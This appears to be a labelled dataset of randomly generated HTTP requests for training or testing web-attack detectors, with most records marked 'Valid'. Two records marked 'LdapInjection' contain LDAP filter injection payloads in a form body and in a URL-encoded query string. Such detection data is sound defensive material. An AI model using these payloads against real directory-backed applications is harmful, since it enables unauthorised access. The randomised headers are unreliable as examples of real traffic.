GET /UVvF4-homeqb/fw6s8doedrrraeo2ea/@G6x5eMU-/iFMi30iVM0t./VgpLUZTU/d2cdLf5QbbB7diQhkSdF/Y5/mEhHvcrwJl5OiVyym_6j.php3?Hoal03kTEna=6en8%3AlIa&pdn=7FkpUn1- HTTP/1.1
Host: www.61kmo.biz
Connection: Afenfov
Accept: */*
Accept-Charset: x-mac-korean;q=0.6, iso-8859-3;q=0.6
Accept-Encoding: gzip;q=0.8, deflate, deflate, deflate;q=0.9
Accept-Language: *;q=0.8
Cache-Control: max-age=5
Client-ip: 95.183.148.111
Cookie: raeanres3=NTd iir?$y ;nt=8fTogVt;1tg7lerxfa4ede=6588490089;eprTaT0tdsu4rI=94136;iframeOzimgH88slCkw=66692231;hinfE=oHgl9Oe
Cookie2: $Version="8"
Date: Wed, 01 Aug 07 21:59:31 CET
ETag: "bH0Wa2Ivh_PEvyy"
Expect: 100-continue
From: rf1it@eeav7.st
If-Modified-Since: Thu, 26 Oct 06 03:15:33 UTC
If-Unmodified-Since: Fri, 03 Feb 06 12:38:51 GMT
If-Match: "FDRjY-wjA.O8-ZExH"
If-None-Match: *
If-Range: Fri, 16 Dec 05 04:18:49 CET
Max-Forwards: 7748
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest nc=C66bc94A
Authorization: Digest algorithm=Uoddit
Range: -658220,9-,-209
Referer: /uscPaie/hycI/meharddt/snp3xe.txt
TE: deflate;q=0.0
Trailer: From
User-Agent: Mozilla/3.4 (X11; U; Open BSD i386 5.2; a3-oa; rv:6.0.4) Gecko/20200609
UA-CPU: 68000
UA-Disp: 1686,350,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 750x449
Via: FTP/2.5 www.bonzuvg.jpeg, bbzte/2.2 45.233.56.132
Transfer-Encoding: deflate
Upgrade: ehokrp/8.9, sno5h/5.5
Warning: 092 9.78.35.144 "reioiertmn" "Fri, 14 May 04 18:56:38 GMT"
X-Forwarded-For: 242.252.112.161
X-Serial-Number: 4673699275390197026
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13807
Start - Id: 6786
class: Valid
PUT /aoSC/uisn/aBDE8WnQLwZn/n0yYy3_BFmOZ_saw2@YX/inSWP.ALWN3rFTL/l0oemuA6eoint/eZmXfoGBEnax4G2oryD2/09SX/0oogiTdz/f5titeo/aHRCCi.mspx? HTTP/1.0
Content-Length: 127
Content-Language: thvEtA1
Content-Encoding: deflate
Content-Location: /iir7csP.jsp
Content-MD5: ZHJ3bmxjdmxiZmluMmRxdA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 02 Feb 09 15:46:33 GMT
Last-Modified: Mon, 25 Aug 08 09:18:19 GMT
Host: www.1eaCdlc3a.biz
Connection: close
Accept: audio/*, audio/*;q=0.5
Accept-Charset: x-mac-korean;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: min-fresh=502
Client-ip: 181.153.33.99
Cookie: 2iw1GS=hC7gcRKUq;muere=)uthlshy;4?;b12oekornpie= nOphp5g:(ze sooedn:
Cookie2: $Version="6"
Date: Mon, 20 Sep 04 16:21:57 UTC
ETag: W/"95Ig-WIGv8SkessGXoD2"
Expect: 100-continue
From: ooti@eeee.gov
If-Modified-Since: Tue, 23 Dec 08 10:27:33 UTC
If-Unmodified-Since: Mon, 09 Nov 09 04:26:57 UTC
If-Match: *
If-None-Match: "fLZ3wdECIY-0PcH2"
If-Range: "U8ZCDzCvBM0rVrLxGch"
Max-Forwards: 3
MIME-Version: 8.7
Pragma: hkP='h'
Proxy-Authorization: 3ptg ojj0e=tta6i
Authorization: NTLM NmNmVHlnZGFzZW50Y2hub2g5dWVuZW50b2lydHNybGF0ZQ==
Range: -8361
Referer: http://hvaeon.be/tf1t/saNtrrnT.dll
TE: gzip
Trailer: Expect
User-Agent: a6eyhsc8ZUt
UA-CPU: 68000
UA-Disp: 610,0382,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 037x6645
Via: kEE/9.3 www.teIor.png, 5.9 www.t579aa.js:58
Transfer-Encoding: identity
Upgrade: 8tEuth/3.6, 0ndlte/6.2, lnc/7.9, e08/7.6
Warning: 897 www.4b8xdAal.jpeg "SHkbAvLcoafh" "Thu, 20 Aug 09 03:54:13 UTC"
X-Forwarded-For: 140.71.84.57
X-Serial-Number: 818589640847285
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

pftxbJ=00&iheFfrWta2sawnl=46305&wp-LU.Sd.=tm&d_5s5b6aQbSL=o he7eduuiannb-&ou5iuehM9=6006&n87Sr5tsh=tnrltnTOa&Snp1a0mosh=eatmamZ

End - Id: 6786
Start - Id: 37603
class: LdapInjection
PUT /DKZ/fD5JC2GELYynvIDa@M5/sXha5epttu1/3eniNrr5faMre/e@p@0w/kdoRhmutwdw/yQ2j@P.xWQHXh.shtml? HTTP/1.1
Content-Length: 31
Content-Language: tpoath3,bU
Content-Encoding: deflate
Content-Location: http://www.divor.biz/yesyr3yt/e0hPa7e.asp
Content-MD5: Zm5hdHNhc2l0dGFibG90aw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 12 Mar 04 19:20:07 GMT
Last-Modified: Fri, 04 Aug 06 09:31:37 CET
Host: www.vcbuen5n.org:80
Connection: 843n
Accept: application/*;q=0.8, video/quicktime, video/*;q=0.8
Accept-Charset: *
Accept-Encoding: identity, identity;q=0.6, identity, compress;q=0.6
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 9.230.19.117
Cookie: fusbve=riT Hda te;w84dm=627926;he=jFZoBC9;eiier4=aT13ku;atleut=cemt
Cookie2: $Version="2"
Date: Fri, 14 Nov 08 18:53:43 GMT
ETag: "@QX@_ywUL101QKMd"
Expect: 100-continue
From: shqwscZ@htnl9xec.gov
If-Modified-Since: Sat, 18 Sep 04 06:42:35 UTC
If-Unmodified-Since: Mon, 25 Sep 06 16:51:15 CET
If-Match: "ESN@9jgCV2kxO9VF"
If-None-Match: *
If-Range: "tTg06f0.opzrIU0l8lk"
Max-Forwards: 1615
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: wCwbd1 E1saai=4olnf
Authorization: NTLM Z2YxM2lmdHl0aG1udG1ydEF0cm9BV2U4aUF3cnJ0dzBJbmxlbW5ybjd0
Range: 5-,297-087
Referer: http://www.s6Atu.gov/pata/6usTrp.gif
TE: chunked;q=0.2,trailers
Trailer: Accept-Language
User-Agent: ZOf4lt/2.5.5.7.1
UA-CPU: PowerPC
UA-Disp: 2548,1743,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 770x317
Via: 2.2 201.112.45.110
Transfer-Encoding: gzip
Upgrade: vYs/1.2
Warning: 943 www.FaAepr.shtml "i9ws4h7nus" 
X-Forwarded-For: 105.35.228.101
X-Serial-Number: 35061677814454
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iwgt=Ekat)( |(sA=*)

End - Id: 37603
Start - Id: 17373
class: Valid
GET /o@TU@raxR/eLalDw8IU7azE-IMlh/eqtoiisieqmiTYmhep/tfDu/Ehbodyz/hnfcn/0iajoP/tza/boot.iniPChtacces6whereallT/sZvwTObIbhNou/ederac5oaa6jpataa/mtEo.jpeg?ta4saltdtozmg=aC80Xep1&nnnagvl=c6%25&vLBa=%5Coo&pioThvosireyis=i&lpg=s1Ky&hr=sseaiUtmiit&absaueo=%24jperl%27usrsuCh+OifaEtr%5C&lrbeRcie3h=2088 HTTP/1.1
Host: www.ihmpi.ch:8579
Connection: keep-alive
Accept: application/*
Accept-Charset: *
Accept-Encoding: gzip;q=0.4, gzip;q=0.1, identity;q=0.8, identity, gzip
Accept-Language: *;q=0.9
Cache-Control: max-age=600
Client-ip: 92.22.206.82
Cookie: 59wgetNYPqx=9;o6ciretv4alltnc=6061315193;no-KsLv@yr=r.4WnVjL;b9=)cnph-rePtmqexp_yosi;a7a= l2
Cookie2: $Version="9"
Date: Sat, 24 Jun 06 16:40:03 UTC
ETag: W/"LLWCNtYswCIam8A"
Expect: s8ba=blew1r;aetws
From: yyIsne@ooTpl.net
If-Modified-Since: Tue, 03 Oct 06 13:57:16 CET
If-Unmodified-Since: Fri, 30 Apr 04 05:11:49 CET
If-Match: "g_5_OS7x9NDJ@fDsxVw"
If-None-Match: *
If-Range: "_9YBEc0WV4okhUa-"
Max-Forwards: 22
MIME-Version: 0.8
Pragma: llu3raa=hdts38D
Proxy-Authorization: ofdre 8Etxoxoo=kwnne
Authorization: aiaet 3cgm1lL=hEwrdsB
Range: 98234-2322,3589-76048,8-
Referer: http://www.byegrbh.fr/tTrsao/neaabne/oenui.tar
TE: gzip,chunked
Trailer: If-Unmodified-Since
User-Agent: sylhk@uB.B http://www.aarho3p0.it
UA-CPU: MIPS
UA-Disp: 436,9131,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0771x1366
Via: FTP/4.3 www.3faN.css, FTP/3.9 www.toyC.tiff
Transfer-Encoding: ufI0oI
Upgrade: haa/8.1, gak/0.7, earct/4.3
Warning: 093 www.vAsrre.js "dcdsstiU7bfkren0e6ts" "Wed, 14 Jul 04 12:45:04 GMT"
X-Forwarded-For: 53.169.130.69
X-Serial-Number: 57813396861
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17373
Start - Id: 4327
class: Valid
POST /eaheaA5er/tYg9054fthENKnY/ebmds2hy@U/761/pxjDcCfyl.png? HTTP/1.0
Content-Length: 119
Content-Language: enyu0
Content-Encoding: gzip
Content-Location: /IIdr4.gif
Content-MD5: b2NlaWV5T2c1T2RvbHA4YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 03 Apr 09 05:59:42 GMT
Last-Modified: Mon, 04 Feb 08 18:39:28 GMT
Host: 33.240.48.193
Connection: keep-alive
Accept: image/*, audio/*;q=0.1
Accept-Charset: x-mac-greek, iso-8859-3;q=0.2, iso-10646-ucs-2
Accept-Encoding: identity, identity
Accept-Language: e-asoeris;q=0.7
Cache-Control: min-fresh=6894
Client-ip: 87.37.0.244
Cookie: LT8eh=tAGB5;oeViEredsoppi=9004
Cookie2: $Version="79"
Date: Fri, 27 Jul 07 01:13:13 UTC
ETag: W/"mZAukJyOO3GuhH1KuBe"
Expect: psAigg
From: hniryitt@cesrtata.de
If-Modified-Since: Tue, 13 Oct 09 18:50:24 CET
If-Unmodified-Since: Sun, 12 Sep 04 12:17:50 CET
If-Match: *
If-None-Match: "H9j0MF5k_I-mPB.ZkDTw"
If-Range: *
Max-Forwards: 505
MIME-Version: 4.3
Pragma: eewgic='sn'
Proxy-Authorization: Digest nonce
Authorization: Digest nonce
Range: -6985,-5545,-0
Referer: http://www.ahla.uk/3hhiig.msf
TE: trailers,trailers,chunked
Trailer: Trailer
User-Agent: Mozilla/9.0 (Windows; U; Windows NT 3.3; ph-ov; rv:8.8.9) Gecko/96544870
UA-CPU: Sparc
UA-Disp: 9274,388,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 8501x1867
Via: plot/6.4 www.h6otq5.tiff
Transfer-Encoding: deflate
Upgrade: ecaed/7.5, nhrtah/6.4, getit/7.6, eo4it/0.0, orii3/9.3
Warning: 980 www.Rrmnetut.css:6 "sOlpsziur" "Wed, 25 Mar 09 01:43:09 GMT"
X-Forwarded-For: 184.207.120.162
X-Serial-Number: 936770860
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lbaPnu=77048749&mahpxniao6sjr=hn/tT5Hra0u&O6Jn=fpassthru&fA=1691&st=a0sce&Asasoheh2o=sr ocSeibah>e=&raen3l=eEPetR

End - Id: 4327
Start - Id: 16686
class: Valid
GET /cO6ZX99_.h/sXtNZ0/vchildGQ/1TPlogjKQ.cfm?dbir=349015&XMFV7=8%7C%26NdguylanOenullv&iexEtndcNmna=9700793&oemntdOebWins=%25operlmllbodyStyo&y5toe7uignerptn=D&Sclhagohzyio=846426339&k6bhBlocationYLperl=fwindow.openiytRZ HTTP/1.0
Host: www.dniobted.biz
Connection: close
Accept: image/*, audio/*
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: r-aKNt, r-fkn, I8n-xu;q=0.3
Cache-Control: max-stale
Client-ip: 146.40.27.106
Cookie: DaKKftptelnetf@x0=2taSoerelrlo;ncthiio26ai=1m@e2)aeo;tt=se353a
Cookie2: $Version="672"
Date: Mon, 29 Mar 10 12:12:26 CET
ETag: "VP_XM1alKh8CZs."
Expect: BSmim
From: noedlreb@rlhth.be
If-Modified-Since: Wed, 27 Apr 05 19:09:19 GMT
If-Unmodified-Since: Fri, 12 Dec 08 05:20:35 GMT
If-Match: "82-MIdU65zu.ayQlAMU"
If-None-Match: *
If-Range: "WwstyyvtXCQLFWyL2"
Max-Forwards: 776
MIME-Version: 2.5
Pragma: te=wlter
Proxy-Authorization: Basic ZXVUV3A6c29iYXJyZU8=
Authorization: nc0yi tCyenTo=kspeuliz
Range: 66423-,495551-51481,-752903
Referer: /eBatsil/mnriio0/ai1eea/reti/ssoeq.rar
TE: deflate;q=0.6
Trailer: TE
User-Agent: Mozilla/8.1 (X11; U; Open BSD i586 2.2; 9v-kJ; rv:9.5.4) Gecko/06243292
UA-CPU: 68000
UA-Disp: 7604,2520,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5546x0271
Via: 3ajt/4.9 www.snoe2g7i.gif, 3.3 www.wees0.png, 0.3 62.110.107.106
Transfer-Encoding: gzip
Upgrade: topnf/0.4, nils/4.5
Warning: 433 www.lsruibo.js "n4idus" 
X-Forwarded-For: 5.185.148.162
X-Serial-Number: 116098500
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16686
Start - Id: 28590
class: Valid
GET /aIne2ai/ntjbsnpd/rYhAYx/uHCr2PzPmTDz8v/GlgQkEPbetweenVt/elsG.UAFeg/so5h9n9eRwTi/_Nt4fCsMM/ees2ked2inihfntle.js? HTTP/1.0
Host: 103.57.151.140
Connection: keep-alive
Accept: video/*;q=0.0, video/quicktime
Accept-Charset: koi8-r
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.8
Cache-Control: min-fresh=694
Client-ip: 156.3.220.158
Cookie: wtsrearr=095576547;g7hrwlez3auy=664722719;uR=ii5
Cookie2: $Version="23"
Date: Tue, 05 Jun 07 17:56:07 UTC
ETag: "NcioNvz7YIdfPzPVN"
Expect: 100-continue
From: toIs6eah@Rhqboi.biz
If-Modified-Since: Fri, 24 Mar 06 18:00:20 CET
If-Unmodified-Since: Wed, 05 Jan 05 22:03:42 UTC
If-Match: *
If-None-Match: "AH9uAZsBX70qsfa9AL@R"
If-Range: Sat, 03 Apr 04 02:13:43 GMT
Max-Forwards: 02
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: NTLM ZTFyRGViM2xoaTY3bGxkajNjYWVvYXNyMGlhSWdlaW9vbnB0bmlO
Range: 2633-,-60,78094-0
Referer: http://dr7rA.be/Encipe/ot2atur.exe
TE: trailers
Trailer: User-Agent
User-Agent: lReheyd (epucattq; e6AtzOWses)
UA-CPU: MIPS
UA-Disp: 242,118,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 2416x4486
Via: 5.3 www.eruoN.tiff
Transfer-Encoding: compress
Upgrade: thto1/0.0, nre/1.4
Warning: 892 www.Cslorh.tiff "4nseq" "Sun, 03 Dec 06 21:05:26 GMT"
X-Forwarded-For: 250.195.95.132
X-Serial-Number: 37650652134780806
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28590
Start - Id: 5125
class: Valid
PUT /0zpvsoAreroa/oriTstl9SbroelkaMa/sBp/2zijSlrcota/lpas2t9tiwnneiKrr4i/4@psand5wJGaor/_Pz/a8EZ98/0t/eotufutBY2U3v8Zim/1elop2lhMjnidegdwism/mC5h.htm? HTTP/1.0
Content-Length: 32
Content-Language: tyj,egt,l7diet
Content-Encoding: gzip
Content-Location: http://www.aclEm.de/etcHil/eoiSs/hiS2tt/h69Mee.bin
Content-MD5: aTRyYWp0M0l1cjF0dGVlbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 05 Oct 07 12:44:44 CET
Last-Modified: Thu, 24 Jan 08 21:39:57 GMT
Host: 66.124.40.47:341
Connection: keep-alive
Accept: image/*, application/*;q=0.4, text/*
Accept-Charset: euc-jp, x-mac-greek;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 204.245.62.183
Cookie: HOaen9=1957737
Cookie2: $Version="67"
Date: Sun, 16 Oct 05 24:48:36 GMT
ETag: "Nw@nYqH4ZzSQAZWp"
Expect: slnxsNt=ujLu;opi8eb=gArT
From: uieNui@f0tYn0rTH.biz
If-Modified-Since: Thu, 24 Jan 08 11:14:28 CET
If-Unmodified-Since: Wed, 18 Nov 09 20:00:17 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1019
MIME-Version: 8.5
Pragma: s=n
Proxy-Authorization: Digest nonce
Authorization: Basic b25sZWtlSDpyaG9xcg==
Range: 5-8296,54-,-908276
Referer: /oh4thomN/sisgl/ozemnes/gettzz/Cetoea0.swf
TE: trailers,deflate;q=0.3
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.4 (X11; U; Linux i386 9.7; ne-tn; rv:9.5.8) Gecko/54442088
UA-CPU: MIPS
UA-Disp: 761,4466,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 387x110
Via: FTP/3.7 www.rksd337.tiff, 8.7 197.232.6.22, 2.4 16.116.248.32
Transfer-Encoding: compress
Upgrade: 7cee/2.2, ualbe/7.8, jivnu/6.0
Warning: 606 52.100.211.135:90 "hAZtmxEys8eovreaorle" 
X-Forwarded-For: 248.188.122.40
X-Serial-Number: 5793925321
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

wo1fmnaptsdntow=l&AXBFz6j_59m=78

End - Id: 5125
Start - Id: 38236
class: LdapInjection
GET /rnr/r7W3nZd1pP3g/wNteoe6s/am/EzlL/rw/J4X3NservicesW/D3maemhreaEb/bMcinGVlike/nS5S1jJiy/Scs@mkFthome8.jpeg?ngasIut5seola4s=23201&4piit=2443&epeiNnapiK=0820957&omhua=rmnsahnenlpl&dhrrsj=062829&oukEtg03rh=1695162&mUitw=kr6mc&n3reokIpvrcK=4600&ocdo=839%29%28%26%28objectClass%3DeTrl%29%28%7C%28sn+++%3D+++yaSI%29%28cn%3Dot++J*%29%29 HTTP/1.0
Host: 42.139.141.211
Connection: close
Accept: */*;q=0.5
Accept-Charset: x-mac-arabic;q=0.1, us-ascii, x-mac-icelandic, x-mac-roman, windows-1255;q=0.8
Accept-Encoding: compress
Accept-Language: *
Cache-Control: max-age=65
Client-ip: 132.120.171.48
Cookie: qRvYZ=lLhCl
Cookie2: $Version="802"
Date: Fri, 30 Mar 07 07:27:25 CET
ETag: W/"4bKLWIf8NoM0jqgX"
Expect: lereii
From: Oni9Cjt@Idhlgm9aom.net
If-Modified-Since: Mon, 12 Jun 06 14:40:50 GMT
If-Unmodified-Since: Wed, 13 Feb 08 10:26:21 UTC
If-Match: "3nsYqJH_6IwPY.6A"
If-None-Match: *
If-Range: *
Max-Forwards: 681
MIME-Version: 8.6
Pragma: eertnoe=iur
Proxy-Authorization: NTLM dGJyYmVzYTJmYWlveUhzNzdyaGJkdzVpbGF0WnRpV256ZmFzdGxtZA==
Authorization: Basic dGVhNmVlbjp6T21ucw==
Range: -9629,18880-,-775909
Referer: /a6on/sEtgAdm/ilexBmp.tiff
TE: trailers,deflate
Trailer: Connection
User-Agent: mtwaensHp
UA-CPU: StrongARM
UA-Disp: 296,8945,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 835x0812
Via: 2.6 www.nnepvn.png
Transfer-Encoding: identity
Upgrade: gcslf/0.5, byhs/2.3, tt7d/1.7
Warning: 960 www.duToe.shtml "ptStgi2naAcbsign2b" "Wed, 02 Nov 05 20:39:52 UTC"
X-Forwarded-For: 188.85.68.116
X-Serial-Number: 3952858356016801
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38236
Start - Id: 30597
class: Valid
GET /znphpW2HkUn/t-I94TkoYP.shtml? HTTP/1.0
Host: www.T1uagr.fr
Connection: tsinrcjp
Accept: audio/*;q=0.0, image/png, application/zip;q=0.9
Accept-Charset: iso-2022-kr;q=0.7, hz-gb-2312;q=0.6, iso-2022-kr, us-ascii;q=0.2
Accept-Encoding: 
Accept-Language: Es-6oheeMj;q=0.2, ogatalz6-ns4waaoe;q=0.2, ftiise4t-jttT, hTjDnae-75KsIH;q=0.9
Cache-Control: only-if-cached
Client-ip: 219.201.94.198
Cookie: En=T%thaYa0alsfjtvn3syae;etZd5ea=0520031;eesr=0a?cyr1r;wruuhcNac=qysayv
Cookie2: $Version="001"
Date: Mon, 09 Aug 04 14:26:39 CET
ETag: "gg1X-8UhAWyIZ5KCUz_-"
Expect: 100-continue
From: deuelaw@Nxba3m1Bw.cz
If-Modified-Since: Thu, 14 Sep 06 22:59:54 GMT
If-Unmodified-Since: Mon, 01 Sep 08 24:47:22 GMT
If-Match: "T0r@cIwj-oZZVxVN4"
If-None-Match: "FdtRvBZnfXh-tcSJ"
If-Range: Tue, 20 Oct 09 10:27:54 GMT
Max-Forwards: 0
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: dlri frtoat=ifoee5n
Authorization: Digest qop=r6j2
Range: 889941-69,6925-6751,26535-
Referer: http://www.eahsid.gov/tijftcnt/arrt/mnoumbno/h4LCcoo/vibtf.mpeg
TE: deflate;q=0.6,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.7 (Windows; U; WinNT 5.7; 6o-c3; rv:6.6.1) Gecko/49746187
UA-CPU: 68000
UA-Disp: 436,0901,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 689x0740
Via: FTP/6.0 www.Getta5Os.png, 9.7 132.38.199.191:47431, 1.3 www.puem.jpg
Transfer-Encoding: deflate
Upgrade: sdiomm/2.1, Wsg/0.8, imNsy/1.7, jse/5.1, nhs/6.4
Warning: 981 www.tChen.tiff "enpV8eeRsnbvnineberf" 
X-Forwarded-For: 113.222.226.64
X-Serial-Number: 79914989141850023
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30597
Start - Id: 11743
class: Valid
GET /1d.U/nGvMYY.6xsCITbqJ0/rq.swf?ydknereoU=9078776&dwmxrnc=3727530&e326l2ErCoiv=660&wna3ytoipiebkb=nls5rb&tr@NjI78N=%24roassystem&ttriead9Y7onec=lefjo&oKmhrazitskiNa=rf2ybmibio&sho=aeg&uuekn0a=eir0hhsEimochaa&OQb8=Aetuh&nlrm5at=sw4m1&fwjonniphes=098729361&wib0=aZLsO7L_MLk&ntelsIrL=nZxEYBV HTTP/1.0
Host: www.deior.fr:80
Connection: close
Accept: image/gif;q=0.3, image/*
Accept-Charset: *;q=0.8
Accept-Encoding: gzip, gzip, compress;q=0.4, compress;q=0.1, gzip;q=0.5
Accept-Language: syel2-t, erslchn-rS7, pLtbio-ooisntrn;q=0.2
Cache-Control: ehh=e9tma
Client-ip: 202.7.189.170
Cookie: elcceao=hm7\&;u9toal=1723774;7RlibZCmWYE=65511183;t8sf2oFp4Ei=rL2h;6W.s08Ksam=a\e~linkvusrDx)8oDr3;m45ssnedsksAmy=0so
Cookie2: $Version="180"
Date: Tue, 01 Nov 05 08:40:10 GMT
ETag: W/"a@6P.77CWrtDMk2PSW"
Expect: 100-continue
From: abst@3k8ohdn.gov
If-Modified-Since: Wed, 21 Oct 09 07:29:55 GMT
If-Unmodified-Since: Wed, 02 Apr 08 07:15:18 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 18 Jan 10 18:06:28 UTC
Max-Forwards: 398
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Digest response="aC035b73FACF986E93e1E771dF14eF2b"
Authorization: Basic ZXRvZGU6aW9ibGhpMmM=
Range: 1-,5-,24371-73606
Referer: http://mriea.net/t4unf/ehshr530/sheno0sD.css
TE: trailers,chunked;q=0.6,trailers
Trailer: Host
User-Agent: Mozilla/6.3 (Windows; U; Win98 1.3; sh-ta; rv:5.0.1) Gecko/53600729
UA-CPU: x86
UA-Disp: 1077,6498,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 362x4409
Via: 0kares/7.7 15.21.171.168, 1.7 185.196.195.102
Transfer-Encoding: sNltE; qeeo=eigsfs
Upgrade: aiubsu/5.7, bEar3/1.8, k5eah/6.6, uatn/4.0
Warning: 990 217.45.111.90 "utbxe9d4csrsohke" 
X-Forwarded-For: 173.221.98.4
X-Serial-Number: 68893779
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 11743
Start - Id: 4736
class: Valid
PUT /aeatewtmsOhs/8v-mXx/fA/e3tqCAjCxkJJORX/yztlhfgea/IGZJ/dw/ezJOAqoBo.shtml? HTTP/1.0
Content-Length: 21
Content-Language: ucorTzee,eEeiD
Content-Encoding: gzip
Content-Location: http://egzOl.ch/Cseiimok/e90a/fNuyia/iv9sr.jsp
Content-MD5: dGh0YWVoYW5uYWluQTVldA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 08 Sep 04 08:33:57 GMT
Last-Modified: Fri, 02 Jun 06 19:15:01 GMT
Host: 139.211.228.66:80
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: wtwtowa-ebeNliss, s-hi, reoma-e
Cache-Control: only-if-cached
Client-ip: 74.45.236.167
Cookie: Csxgmr=s8eNcmd5ie;opk69flztys=0351271;Ueall-KtU=4176659
Cookie2: $Version="53"
Date: Sun, 31 Oct 04 24:48:51 CET
ETag: "rivHu02ZNMmhgONtz"
Expect: 100-continue
From: potNyp8h@nruv.uk
If-Modified-Since: Mon, 26 Feb 07 20:23:26 CET
If-Unmodified-Since: Sun, 26 Aug 07 05:02:57 GMT
If-Match: *
If-None-Match: *
If-Range: "6.kVY6B1Y-4j1WEP6fCw"
Max-Forwards: 64
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: NTLM NmdycnBldm9hb3Z6Yml1bU00aWxjZWRzcmFyZGVlbGVFZXJ0YUN0Y2NlUXNu
Authorization: NTLM ZXRlc3Zub3BiZGVsam5lbDN0OGtjZWxvZWU2ZW9vY243c2dOaW9rd3J0Tw==
Range: -31108
Referer: http://www.cddsa.cz/gW3y/lkleaNl/G8r1/tifutii/elRt.php
TE: trailers,gzip;q=0.2
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.5 (compatible; nlirsbiae; Unix; ibnoubsda)
UA-CPU: MIPS
UA-Disp: 8346,6633,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 4366x138
Via: HTTP/3.0 www.etynoet4.jpg, HTTP/3.4 www.oowonoe.png, 3.0 100.236.46.238
Transfer-Encoding: identity
Upgrade: gto1/9.1, noos/2.9, su2trm/7.6, u0Ntk/3.5
Warning: 956 24.210.177.89 "qt9hoeeRnsan5aor" "Sat, 30 Sep 06 12:08:47 GMT"
X-Forwarded-For: 247.63.27.49
X-Serial-Number: 64993875
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

gtyLrsb1yx=dCp4SN3W-3

End - Id: 4736
Start - Id: 32153
class: Valid
GET /wgetb8e_w/x2UEk/sBPjdQ7ddKcE4GtCl/gjh98fLhw/eheqmrszaRWl.asmx? HTTP/1.1
Host: 210.157.235.110:0
Connection: Etrteuot
Accept: image/*;q=0.2
Accept-Charset: macintosh, windows-1251;q=0.9, x-mac-korean;q=0.5, iso-8859-2, cp-936;q=0.4
Accept-Encoding: identity;q=0.8, identity, compress
Accept-Language: hthcee-5aeaw, yh1-yotoeey, nleiuii-lsor;q=0.3, 2rgerTa-h;q=0.8, zfs8-esatnb;q=0.2
Cache-Control: If=i
Client-ip: 202.51.151.14
Cookie: i7ocuH=weEVamaqy;Trtlae=onGnh
Cookie2: $Version="79"
Date: Thu, 06 Dec 07 02:42:42 CET
ETag: "CH.WFiPEwxl1KjUgSnC"
Expect: 100-continue
From: fcshsyfh@3ynaok.gov
If-Modified-Since: Sat, 25 Oct 08 06:48:29 GMT
If-Unmodified-Since: Fri, 15 Jun 07 17:26:53 GMT
If-Match: "Oi4d6FmSUanny0lLu7LT"
If-None-Match: *
If-Range: *
Max-Forwards: 81
MIME-Version: 9.3
Pragma: otw='wtd'
Proxy-Authorization: ehuic ztnirYi=Taheeeu
Authorization: Basic cjVqZ0RoOmh5bmFsTjk=
Range: -0115,-092360,694-525
Referer: /Ifmo9nd/uiApwh/2etaoba/lhsW/mtidha9.swf
TE: trailers,gzip,trailers
Trailer: Referer
User-Agent: peNsgicsnpneucRt
UA-CPU: Sparc
UA-Disp: 3488,5746,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 320x815
Via: 8.1 20.255.223.28
Transfer-Encoding: Eaquea
Upgrade: nwood/9.3
Warning: 953 85.108.253.61 "sa7gxeiapkth" 
X-Forwarded-For: 71.26.127.147
X-Serial-Number: 30016266128
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 32153
Start - Id: 24367
class: Valid
GET /rglOsplsl/inperOgt/zgNse8heS7oat/emUIWJZeQ.cgi?7spmmvcsG=aasostiwnit+l&logLLKQMd=06321717 HTTP/1.1
